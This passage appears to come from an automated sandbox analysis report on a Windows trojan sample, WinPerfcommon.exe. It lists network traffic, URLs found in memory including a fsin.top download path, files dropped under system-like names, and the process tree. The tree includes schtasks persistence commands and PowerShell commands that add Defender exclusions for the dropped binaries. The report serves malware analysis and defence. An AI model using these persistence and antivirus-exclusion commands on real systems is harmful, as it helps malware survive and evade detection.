Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:25 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:28 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Sat, 11 Jan 2025 15:22:30 GMT | Content-Type: text/html; charset=UTF-8 | Content-Length: 213 | Connection: keep-alive | Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e | Data Ascii: <html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: powershell.exe, 00000016.00000002.3285415906.0000020318470000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000018.00000002.3236041998.000001FAFDD60000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micros-
Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003544000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fsin.top
Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fsin.top/
Source: pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003393000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fsin.top/javascriptCentraldownloads.php
Source: powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mic
Source: powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: WinPerfcommon.exe, 00000000.00000002.1747143226.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003303000.00000004.00000800.00020000.00000000.sdmp, pzPgKRlGoglDaRzDTBMXwbN.exe, 00000031.00000002.1842118117.0000000003934000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000016.00000002.1860699365.00000203003C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686F98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48DA08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223278D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000016.00000002.3291842516.0000020318590000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 0000001A.00000002.3321971491.000001D69EEA0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000016.00000002.1860699365.00000203001A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1885805844.000001FAE5CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1869672949.000001D686D71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.1879031219.000001B48D7E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1869974857.00000223276B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.1870782113.0000015898F12000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000020.00000002.1870782113.000001589912A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000016.00000002.2849335154.0000020310213000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2934001847.000001D696DE3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001C.00000002.3054085979.000001B49D854000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.2991988808.0000022337724000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000020.00000002.2936625519.00000158A8F74000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe\:Zone.Identifier:$DATA
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Windows\Installer\05a9f81f8aa671
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: c:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File deleted: C:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9B800D48
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9B800E43
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Code function: 0_2_00007FFD9BC10575
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Code function: 49_2_00007FFD9BBF0575
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Code function: 50_2_00007FFD9B7C0D48
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Code function: 50_2_00007FFD9B7C0E43
Source: Joe Sandbox View | Dropped File: C:\Users\user\Desktop\EAqnjiFq.log DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
Source: zsLwvutf.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zGtWfQBc.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: izcrMdWN.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZQJbcBRg.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: YLyBcRbf.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PipMsYLy.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GEhWIfwR.log.0.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fyKARhRs.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: yHNOGCAC.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: iFHJmzLo.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZWotDWGG.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PoUdTuAY.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: GKMojBlr.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: EAqnjiFq.log.49.dr | Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WinPerfcommon.exe, 00000000.00000002.1804824890.000000001BCBB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCmd.Exej% vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 00000000.00000000.1682250374.00000000004F0000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 0000002D.00000002.2312164491.0000000002910000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.0000000003521000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.00000000035D6000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.000000000352C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe, 0000002F.00000002.2401874949.0000000003510000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe | Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs WinPerfcommon.exe
Source: WinPerfcommon.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: WinPerfcommon.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SgrmBroker.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SystemSettings.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pzPgKRlGoglDaRzDTBMXwbN.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: pzPgKRlGoglDaRzDTBMXwbN.exe0.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: StartMenuExperienceHost.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal100.spre.troj.expl.evad.winEXE@67/71@1/1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Program Files\Adobe\StartMenuExperienceHost.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\Desktop\zsLwvutf.log
Source: C:\Program Files\Adobe\StartMenuExperienceHost.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-nQmtb0EsMA9tAW54k3K0
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7300:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File created: C:\Users\user\AppData\Local\Temp\wuved4iv
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
Source: WinPerfcommon.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WinPerfcommon.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\WinPerfcommon.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (this identical entry appears 18 times in the report)
Source: C:\Windows\System32\schtasks.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WinPerfcommon.exe | ReversingLabs: Detection: 63%
Source: WinPerfcommon.exe | Virustotal: Detection: 70%
Source: C:\Users\user\Desktop\WinPerfcommon.exe | File read: C:\Users\user\Desktop\WinPerfcommon.exe
Source: unknown | Process created: C:\Users\user\Desktop\WinPerfcommon.exe "C:\Users\user\Desktop\WinPerfcommon.exe"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wuved4iv\wuved4iv.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA39D.tmp" "c:\Windows\System32\CSCCE33B305EBF546CF9142A728297AE6DA.TMP"
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 9 /tr "'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 11 /tr "'C:\Recovery\SystemSettings.exe'" /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettings" /sc ONLOGON /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SystemSettingsS" /sc MINUTE /mo 7 /tr "'C:\Recovery\SystemSettings.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 12 /tr "'C:\Recovery\SgrmBroker.exe'" /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBroker" /sc ONLOGON /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "SgrmBrokerS" /sc MINUTE /mo 13 /tr "'C:\Recovery\SgrmBroker.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 5 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbN" /sc ONLOGON /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "pzPgKRlGoglDaRzDTBMXwbNp" /sc MINUTE /mo 10 /tr "'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommon" /sc ONLOGON /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "WinPerfcommonW" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\WinPerfcommon.exe'" /rl HIGHEST /f
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Adobe\StartMenuExperienceHost.exe'
Source: unknown | Process created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Installer\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SystemSettings.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SgrmBroker.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\WinPerfcommon.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe C:\Recovery\pzPgKRlGoglDaRzDTBMXwbN.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Recovery\SgrmBroker.exe C:\Recovery\SgrmBroker.exe
Source: unknown | Process created: C:\Recovery\SgrmBroker.exe C:\Recovery\SgrmBroker.exe
Source: C:\Users\user\Desktop\WinPerfcommon.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\BUc8lPV5KF.bat"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
Source: unknown | Process created: C:\Program Files\Adobe\StartMenuExperienceHost.exe "C:\Program Files\Adobe\StartMenuExperienceHost.exe"
Source: unknown | Process created: C:\Recovery\SystemSettings.exe C:\Recovery\SystemSettings.exe
Source: unknown | Process created: C:\Recovery\SystemSettings.exe C:\Recovery\SystemSettings.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown | Process created: C:\Users\user\Desktop\WinPerfcommon.exe C:\Users\user\Desktop\WinPerfcommon.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: unknown | Process created: C:\Users\user\Desktop\WinPerfcommon.exe C:\Users\user\Desktop\WinPerfcommon.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
